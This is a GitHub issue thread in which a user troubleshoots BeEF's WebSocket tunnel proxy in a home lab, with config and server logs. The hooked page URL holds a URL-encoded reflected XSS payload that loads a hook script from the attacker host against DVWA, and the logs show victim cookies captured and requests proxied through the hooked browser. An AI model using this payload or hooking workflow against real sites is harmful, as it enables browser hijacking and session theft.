Problem with WebSocket Tunnel Proxy on Kali #947
Comments
|
Are you using htt://<beef_server>:6789/ as the proxy address? |
|
Thanks for the quick response. As stated, using 127.0.0.1:6789 works fine, it is web sockets proxy (using 127.0.0.1:61985) that is not working for me. Nothing else is using that port (I checked). |
|
I may have misunderstood how the web sockets proxy works. Do I continue to use port 6789 for my proxy when websockets is enabled? I thought I was suppose to change my browser proxy to :61985 for non-secure websockets and 61986 for secure websockets. Is that correct or incorrect? |
|
Michele, my apologies. I misunderstood. I thought when websockets was enabled that I had to change the proxy to 61985. I compared sending requests both with websockets disabled, and then enabled, both times using :6789, and the time it took to respond for each was significantly different. I now understand that the reference is to the ports the websockets are using, NOT for the proxy (which remains 6789). Thanks again for the response, apologies for wasting time. |
|
No problems mate ;-) Glad you like the project. If you think of any improvements/bugs in the tunneling proxy component, let me know. |
ghost
assigned 
I'm able to get the Tunnel Proxy to work on port 6789, but I'm not able to get the websocket tunnel proxies to work (either secure or non-secure). I'm using beef 0.4.4.7 (alpha). I'm on Kali linux i386 gnome (Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux) running on VMFusion on OSX Mtn Lion, and have Ruby 1.9.3 installed (ruby 1.9.3p194 (2012-04-20 revision 35410) [i486-linux]). I updated the config.yaml to enable websockets. I cleared the history of both the hooked browser and the browser that is setup to proxy through the hooked browser. The hooked browser is FireFox v23.0.1 (OSX). The browser setup to proxy through the hooked browser is IceWeasel v18.0.1 (Kali) using FoxyProxy Basic (plug-in) v3.2.3. I noticed that the BeEF server console displays that it started the WebSocket server on port 61985, but the timer is null (even though the timer value is set in config.yaml). The BeEF server console also displays a message that a new websocket channel has been opened when I attempt to access the same web server (same SOP) as the hooked browser accessed, but the browser errors with "connection was reset". The browser detailed info of the hooked browser states it supports websockets. I would appreciate any suggestions on what might be the cause of this (I'm still continuing to troubleshoot but running out of ideas of what it might be).
Thanks!
~Tony
config.yaml (websockets)
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: true
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
BeEF server output:
root@kali:/usr/share/beef# clear; ruby beef -x -v
[10:07:43][>] Loaded extension: 'proxy'
[10:07:43][>] Loaded extension: 'xssrays'
[10:07:43][>] Loaded extension: 'demos'
[10:07:43][>] Loaded extension: 'autoloader'
[10:07:43][>] Loaded extension: 'requester'
[10:07:43][>] Loaded extension: 'events'
[10:07:43][>] Loaded extension: 'admin_ui'
[10:07:43][] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[10:07:43][>] Loaded extension: 'ipec'
[10:07:43][>] Loaded extension: 'social_engineering'
[10:07:43][>] Loaded extension: 'console'
[10:07:43][*] Browser Exploitation Framework (BeEF) 0.4.4.7-alpha
[10:07:43] | Twit: @beefproject
[10:07:43] | Site: http://beefproject.com
[10:07:43] | Blog: http://blog.beefproject.com
[10:07:43] | Wiki: https://github.com/beefproject/beef/wiki
[10:07:43][] Project Creator: Wade Alcorn (@wadealcorn)
[10:07:44][] 10 extensions enabled.
[10:07:44][] 182 modules enabled.
[10:07:44][] 2 network interfaces were detected.
[10:07:44][+] running on network interface: 127.0.0.1
[10:07:44] | Hook URL: http://127.0.0.1:3000/hook.js
[10:07:44] |_ UI URL: http://127.0.0.1:3000/ui/panel
[10:07:44][+] running on network interface: 192.168.100.138
[10:07:44] | Hook URL: http://192.168.100.138:3000/hook.js
[10:07:44] |_ UI URL: http://192.168.100.138:3000/ui/panel
[10:07:44][] RESTful API key: a7ea8fc84a99ac78f4a49dbc89ea9d9b4934f725
[10:07:44][] Starting WebSocket server on port [61985], timer []
[10:07:44][_] Starting WebSocketSecure server on port [61986], timer []
[10:07:44][] HTTP Proxy: http://127.0.0.1:6789
[10:07:44][] BeEF server started (press control+c to stop)
[10:08:05][>] New WebSocket channel open.
[10:08:05][>] WebSocket - Browser says helo! WebSocket is running[10:08:05][>] [INIT] Processing Browser Details...
[10:08:05][>] WebSocket - activeSocket content [{"AVUeIEVClGg2zwjTfLAgb1y3oB3tEO9S5dlXvWKFKOHFA1kcpFzkBLHrq2ybOjV0HRIqyKtGv6wzAQsy"=>#<EventMachine::WebSocket::Connection:0xa5c6c28 @Signature=30, @options={:host=>"0.0.0.0", :port=>61985}, @debug=false, @secure=false, @tls_options={}, @DaTa=nil, @OnMessage=#Proc:0xa5c673c@/usr/share/beef/core/main/network_stack/websocket/websocket.rb:170, @handler=#<EventMachine::WebSocket::Handler13:0xa5f8624 @request={"method"=>"GET", "path"=>"/", "query"=>{}, "host"=>#<Addressable::URI:0x52fc4e8 URI:ws://192.168.100.138:61985>, "user-agent"=>"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0", "accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8", "accept-language"=>"en-US,en;q=0.5", "accept-encoding"=>"gzip, deflate", "sec-websocket-version"=>"13", "origin"=>"http://192.168.100.139", "sec-websocket-key"=>"+PGvxJYGdsUtNdXF3OyJRw==", "connection"=>"keep-alive, Upgrade", "pragma"=>"no-cache", "cache-control"=>"no-cache", "upgrade"=>"websocket"}, @connection=#<EventMachine::WebSocket::Connection:0xa5c6c28 ...>, @debug=false, @State=:connected, @DaTa="\x81\xDC\xD4\xBD[\x1D\xAF\x9F:q\xBD\xCB>?\xEE\x9F\x1AK\x81\xD8\x12X\x82\xFE7Z\xB3\x8F!j\xBE\xE9=Q\x95\xDA9,\xAD\x8E4_\xE7\xC9\x1ER\xED\xEEny\xB8\xE5-J\x9F\xFB\x10R\x9C\xFB\x1A,\xBF\xDE+[\xAE\xD6\x19Q\x9C\xCF_/\xAD\xDF\x14w\x82\x8D\x13O\x9D\xCC"V\xA0\xFA-+\xA3\xC7\x1AL\xA7\xC4y`", @application_data_buffer="">>}]
[10:08:05][!] [Browser Details] Invalid page title returned from the hook browser's initial connection.
[10:08:05][*] New Hooked Browser [id:1, ip:192.168.100.1, type:FF-23, os:Intel Mac OS X 10.8], hooked domain [192.168.100.139:80]
[10:08:16][_] Using Hooked Browser with ip [192.168.100.1] as Tunneling Proxy
[10:08:39][>] New WebSocket channel open.
[10:08:53][>] [PROXY] --> Forwarding request #1: domain[192.168.100.139:80], method[GET], path[/], cross domain[true]
[10:08:53][>] [PROXY] <-- Response for request #1 to [/] on domain [192.168.100.139:80] correctly processed
[10:08:53][>] [PROXY] --> Forwarding request #2: domain[192.168.100.139:80], method[GET], path[/index.css], cross domain[true]
[10:08:53][>] [PROXY] --> Forwarding request #4: domain[192.168.100.139:80], method[GET], path[/images/owasp.png], cross domain[true]
[10:08:53][>] [PROXY] --> Forwarding request #5: domain[192.168.100.139:80], method[GET], path[/jquery.min.js], cross domain[true]
[10:08:53][>] [PROXY] --> Forwarding request #6: domain[192.168.100.139:80], method[GET], path[/images/Knob_Add.png], cross domain[true][10:08:53][>] [PROXY] --> Forwarding request #3: domain[192.168.100.139:80], method[GET], path[/animatedcollapse.js], cross domain[true]
[10:08:53][>] [PROXY] --> Forwarding request #7: domain[192.168.100.139:80], method[GET], path[/images/mandiant.png], cross domain[true]
[10:08:54][>] [PROXY] <-- Response for request #2 to [/index.css] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] <-- Response for request #5 to [/jquery.min.js] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] <-- Response for request #7 to [/images/mandiant.png] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] <-- Response for request #6 to [/images/Knob_Add.png] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] <-- Response for request #3 to [/animatedcollapse.js] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] --> Forwarding request #8: domain[192.168.100.139:80], method[GET], path[/images/Knob_Attention.png], cross domain[true]
[10:08:54][>] [PROXY] <-- Response for request #4 to [/images/owasp.png] on domain [192.168.100.139:80] correctly processed
[10:08:55][>] [PROXY] <-- Response for request #8 to [/images/Knob_Attention.png] on domain [192.168.100.139:80] correctly processed
Hooked Browser Details:
Browser Name: Firefox
Initialization
Browser Version: 23
Initialization
Browser UA String: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Initialization
Browser Platform: MacIntel
Initialization
Browser Plugins: Shockwave Flash-v.11.9.900.117,QuickTime Plug-in 7.7.1-v.7.7.1,Java Applet Plug-in-v.Java 7 Update 25,iPhotoPhotocast-v.7.0,SharePoint Browser Plug-in-v.14.3.4,WebEx64 General Plugin Container-v.1.0,Silverlight Plug-In-v.5.1.10411.0,Citrix Receiver Plug-in-v.11.4.3
Initialization
Window Size: Width: 1243, Height: 781
Initialization
Category: Browser Components (16 Items)
Flash: Yes
Initialization
Java: No
Initialization
VBScript: No
Initialization
PhoneGap: No
Initialization
Google Gears: No
Initialization
Silverlight: Yes
Initialization
Web Sockets: Yes
Initialization
QuickTime: Yes
Initialization
RealPlayer: No
Initialization
Windows Media Player: No
Initialization
VLC: No
Initialization
Foxit Reader: No
Initialization
WebRTC: Yes
Initialization
ActiveX: No
Initialization
Session Cookies: Yes
Initialization
Persistent Cookies: Yes
Initialization
Category: Hooked Page (4 Items)
Page URI: http://192.168.100.139/dvwa/vulnerabilities/xss_r/?name=%3Cscript+src%3D%22http%3A%2F%2F192.168.100.138%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E#
Initialization
Page Referrer: Unknown
Initialization
Host Name/IP: 192.168.100.139
Initialization
Cookies: security=low; PHPSESSID=4agdflb0ffd8jbi865qkc038u4
Initialization
Category: Host (6 Items)
Date: Mon Nov 25 2013 10:08:04 GMT-0500 (EST)
Initialization
Operating System: Intel Mac OS X 10.8
Initialization
Hardware: Unknown
Initialization
CPU: 32-bit
Initialization
Screen Size: Width: 2560, Height: 1440, Colour Depth: 24
Initialization
Touch Screen: No
The text was updated successfully, but these errors were encountered: